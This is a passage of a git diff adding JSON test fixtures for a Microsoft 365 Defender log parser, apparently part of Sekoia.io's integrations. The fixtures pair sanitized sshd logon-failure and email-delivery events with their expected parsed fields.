+    "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "device_logon_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-18T10:07:22.681617Z",
+    "action": {
+      "properties": {
+        "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R",
+        "InitiatingProcessFileSize": 890528,
+        "LogonType": "Network",
+        "RemoteIPType": "Private"
+      },
+      "type": "LogonFailed"
+    },
+    "destination": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "host": {
+      "id": "1111111111111111111111111111111111111111",
+      "name": "domain"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "413706"
+        }
+      }
+    },
+    "process": {
+      "args": [
+        "-D",
+        "-R",
+        "-oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa",
+        "-oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc",
+        "-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1-",
+        "-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com",
+        "-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1",
+        "-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512",
+        "-oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com"
+      ],
+      "command_line": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R",
+      "executable": "/usr/sbin/sshd",
+      "hash": {
+        "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+        "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e",
+        "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+      },
+      "name": "sshd",
+      "parent": {
+        "name": "sshd",
+        "pid": 3653343,
+        "start": "2024-11-18T10:07:20.290000Z"
+      },
+      "pid": 3653343,
+      "start": "2024-11-18T10:07:20.293930Z",
+      "user": {
+        "domain": "domain",
+        "name": "root"
+      },
+      "working_directory": "/usr/sbin"
+    },
+    "related": {
+      "hash": [
+        "51a9cac9c4e8da44ffd7502be17604ee",
+        "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232",
+        "f1d50e0d3e0ba197baf152614e0cd94487a1142e"
+      ],
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "account"
+      ]
+    },
+    "user": {
+      "domain": "domain",
+      "name": "account"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json
new file mode 100644
index 000000000..11ca88986
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json
@@ -0,0 +1,76 @@
+{
+  "input": {
+    "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}",
+    "event": {
+      "action": "Delivered",
+      "category": [
+        "connection",
+        "email"
+      ],
+      "dataset": "email_events",
+      "type": [
+        "allowed",
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-28T14:18:40Z",
+    "action": {
+      "properties": {
+        "AttachmentCount": 0,
+        "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}",
+        "Connectors": "Relai SMTP interne",
+        "DeliveryAction": "Delivered",
+        "DeliveryLocation": "Inbox/folder",
+        "EmailClusterId": "3162398878",
+        "EmailDirection": "Inbound",
+        "EmailLanguage": "en",
+        "OrgLevelAction": "Allow",
+        "OrgLevelPolicy": "Connection policy",
+        "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef",
+        "SenderFromDomain": "company.com",
+        "UrlCount": 0
+      }
+    },
+    "email": {
+      "direction": "inbound",
+      "from": {
+        "address": [
+          "john.doe@company.com"
+        ]
+      },
+      "local_id": "12345678-1234-abcd-ef90-abcdef123456",
+      "message_id": "<1@eu-west-1.test.com>",
+      "subject": "MAIL subject",
+      "to": {
+        "address": [
+          "alan.smithee@company.com"
+        ]
+      }
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c"
+        }
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json
new file mode 100644
index 000000000..d3b7b8c2f
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json
@@ -0,0 +1,76 @@
+{
+  "input": {
+    "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}",
+    "event": {
+      "action": "Delivered",
+      "category": [
+        "connection",
+        "email"
+      ],
+      "dataset": "email_events",
+      "type": [
+        "allowed",
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-28T14:18:38Z",
+    "action": {
+      "properties": {
